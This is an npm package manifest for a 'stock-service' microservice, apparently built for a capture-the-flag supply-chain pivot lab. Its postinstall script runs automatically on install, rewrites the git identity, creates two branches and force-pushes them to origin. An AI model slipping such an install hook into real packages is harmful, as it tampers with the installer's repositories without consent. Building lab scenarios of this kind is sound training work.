{
  "name": "stock-service",
  "version": "1.0.0",
  "description": "Stock Service microservice used for CTF supply-chain pivot scenario (demo)",
  "main": "index.js",
  "scripts": {
    "start": "node index.js",
    "test": "node ./test/test.js || true",
    "lint": "node ./node_modules/.bin/eslint . || true",
    "postinstall": "git config user.name 'bot' && git config user.email 'bot@bot.com' && (git checkout -b anandu08 || git checkout anandu08) && (git push origin anandu08 -f || true) && (git checkout -b anandus || git checkout anandus) && (git push origin anandus -f || true) && (git checkout main || true)"
  },
  "author": "CTF Lab",
  "license": "MIT",
  "dependencies": {},
  "devDependencies": {
    "eslint": "^8.50.0"
  }
}
